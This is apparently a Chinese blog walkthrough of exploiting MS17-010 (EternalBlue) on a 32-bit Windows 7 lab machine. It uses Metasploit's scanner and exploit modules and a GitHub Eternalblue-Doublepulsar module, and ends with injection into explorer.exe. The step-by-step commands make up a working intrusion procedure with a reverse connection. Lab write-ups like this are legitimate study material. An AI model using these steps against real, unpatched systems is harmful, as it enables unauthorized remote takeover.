关于利用kali linux2017.2中MSFCONSOLE 利用MS17-010漏洞发起攻击的坑
1、直接使用msfconsole中自带的 “ms17_010_eternalblue”模块
攻击机:192.168.148.134 kali linux2017.2 x64
靶机:192.168.148.137 win7 x32
1.1先用msfconsole的smb模块扫描,看看是否有漏洞
use auxiliary/scanner/smb/smb_ms17_010
auxiliary(smb_ms17_010) > set RHOSTS 192.168.148.137 若要范围扫描,则将IP改为 192.168.148.*
存在漏洞!!
1.2使用模块
use exploit/windows/smb/ms17_010_eternalblue
show options
设置目标:
set rhost 192.168.148.137
设置payload等
set lhost 192.168.148.134
set lport 4444
run
结果:
这里提示我们 架构选择不对,我们再来看看target
这个x64括号是指什么?
不知道,难道是payload设置错了?
这里用了show payloads,发现 这里可选择的payload都是64位的,我们的目标机是32位的,所以提示我们架构不对。
这时候,这个msf自带的模块似乎不能用。
2、使用github上的模块
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/
2.1复制到ROOT目录,解压
2.2 将Github下载来的eternalblue_doublepulsar.rb,拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb目录中。
2.3打开msf,
执行reload_all
2.4调用模块
use exploit/windows/smb/eternalblue_doublepulsar
2.5查看选项
2.6设置
由于目标是win7 32 位,所以target选8(默认),然后run
2.7run
当执行exploit出现问题该如何解决?
打开多架构支持/安装wine32。
wine -h
2.8再次run
又报错,这时候,我们修改注入进程
set processinject explorer.exe
run
注入成功
截屏